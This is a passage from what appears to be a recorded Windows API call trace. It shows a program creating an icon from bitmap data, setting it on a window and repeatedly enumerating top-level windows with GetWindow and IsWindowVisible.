h=0x14050929, c=24, pv=0x12f270 | out: pv=0x12f270) returned 24 [0057.439] GlobalLock (hMem=0x1ba0024) returned 0x1e2628 [0057.439] GetBitmapBits (in: hbit=0x14050929, cb=128, lpvBits=0x1e2628 | out: lpvBits=0x1e2628) returned 128 [0057.439] CreateIcon (hInstance=0x400000, nWidth=32, nHeight=32, cPlanes=0x1, cBitsPixel=0x20, lpbANDbits=0x1e2628, lpbXORbits=0x1deec0) returned 0x80175 [0057.439] GlobalUnlock (hMem=0x1ba001c) returned 0 [0057.439] GlobalUnlock (hMem=0x1ba0024) returned 0 [0057.439] SelectObject (hdc=0x2301092d, h=0x185000f) returned 0x14050929 [0057.439] DeleteObject (ho=0x14050929) returned 1 [0057.439] ReleaseDC (hWnd=0x0, hDC=0x200107f3) returned 1 [0057.439] GlobalUnlock (hMem=0x1ba000c) returned 0 [0057.439] SendMessageA (hWnd=0x601a8, Msg=0x80, wParam=0x0, lParam=0x80175) returned 0x0 [0057.439] DefWindowProcA (hWnd=0x601a8, Msg=0x80, wParam=0x0, lParam=0x80175) returned 0x0 [0057.439] IUnknown:Release (This=0x1d8b18) returned 0x0 [0057.440] IsIconic (hWnd=0x601a8) returned 0 [0057.440] IsZoomed (hWnd=0x601a8) returned 0 [0057.440] GetClientRect (in: hWnd=0x601a8, lpRect=0x12f4a0 | out: lpRect=0x12f4a0) returned 1 [0057.440] GetWindow (hWnd=0x601a8, uCmd=0x5) returned 0x0 [0057.440] GetCurrentThreadId () returned 0xb88 [0057.440] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.441] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.441] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.441] DefWindowProcA (hWnd=0x301fc, Msg=0x47, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.442] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.442] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.442] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.442] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.442] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.442] GetWindow (hWnd=0x200c6, 
uCmd=0x2) returned 0x200d6 [0057.442] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.442] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.442] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.442] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.442] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.442] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.442] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.442] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.442] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.442] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.442] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.442] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.442] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.442] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.442] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.442] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.442] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.442] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.442] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.442] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.442] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.442] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.442] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.442] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.443] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.443] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.443] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.443] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.443] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.443] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.443] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.443] GetWindow 
(hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.443] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.443] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.443] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.443] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.443] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.443] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.443] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.443] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.443] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.443] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.443] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.443] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.443] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.443] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.443] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.443] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.443] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.444] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.444] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.444] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.444] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.444] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.444] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.444] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.444] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.444] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.444] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.444] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.444] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.444] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.444] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 
[0057.444] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.444] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.444] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.444] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.444] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.444] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.444] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.444] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.444] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.445] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.445] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.445] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.445] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.445] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.445] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.445] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.445] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.445] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.445] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.445] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.445] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.445] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.445] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.445] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.445] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.445] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.445] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.445] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.445] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.445] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.445] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.445] GetWindow (hWnd=0x100f0, uCmd=0x2) 
returned 0x100f2 [0057.445] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.445] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.446] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.446] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.446] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.446] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.446] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.446] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.446] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.446] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.446] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.446] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.446] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.446] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.446] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.446] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.446] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.446] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.446] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.446] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.446] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.446] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.446] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.446] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.446] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.446] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.447] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.447] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.447] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.447] GetWindow (hWnd=0x10118, uCmd=0x2) returned 
0x10112 [0057.447] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.447] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.447] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.447] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.447] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.447] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.447] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.447] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.447] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.447] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.447] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.447] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.447] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.447] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.447] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.447] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.447] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.447] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.447] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.447] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.447] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.447] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.447] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.447] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.448] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.448] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.448] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.448] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.448] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.448] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.448] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.448] GetWindow (hWnd=0x201c4, uCmd=0x2) 
returned 0x101b8 [0057.448] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.448] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.448] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.448] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.448] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.448] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.448] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.448] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.448] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.448] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.448] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.448] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.448] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.448] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.448] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.448] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.448] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.448] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.448] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.448] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.449] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.449] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.449] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.449] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.449] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.449] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.449] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.449] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.449] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.449] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.449] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.449] GetWindow 
(hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.449] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.449] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.449] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.449] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.449] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.449] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.449] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.449] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.449] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.449] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.449] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.449] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.449] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.449] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.449] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.449] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.449] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.449] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.449] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.449] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.450] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.450] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.450] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.450] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.450] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.450] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.450] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.450] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.450] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.450] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.450] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a 
[0057.450] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.450] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.450] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.450] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.450] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.450] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.450] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.450] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.450] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.450] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.450] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.450] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.450] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.450] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.450] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.450] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.450] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.450] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.450] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.450] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.451] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.451] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.451] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.451] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.451] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.451] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.451] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.451] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.451] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.451] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.451] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, 
lParam=0x12f134) returned 0x0 [0057.451] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.451] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.451] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.451] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.451] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.451] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.451] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.451] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.451] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.451] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.451] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.451] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.451] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.451] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.451] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.451] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.451] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.451] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.452] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.452] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.452] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.452] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.452] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.452] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.452] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.452] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.452] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.452] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.452] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.452] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.452] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 
0x201d4 [0057.452] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.452] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.452] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.452] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.452] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.452] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.452] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.452] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.452] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.452] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.452] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.452] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.452] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.453] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.453] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.453] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.453] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.453] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.453] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.453] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.453] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.453] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.453] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.453] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.453] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.453] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.453] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.453] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.453] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.453] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.453] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.453] GetWindow (hWnd=0x10162, 
uCmd=0x2) returned 0x1015c [0057.453] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.453] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.453] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.453] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.453] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.453] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.454] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.454] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.454] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.454] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.454] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.454] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.454] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.454] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.454] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.454] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.454] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.454] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.454] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.454] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.454] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.454] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.454] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.454] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.454] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.454] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.454] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.454] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.454] GetWindow (hWnd=0x2001c, uCmd=0x2) 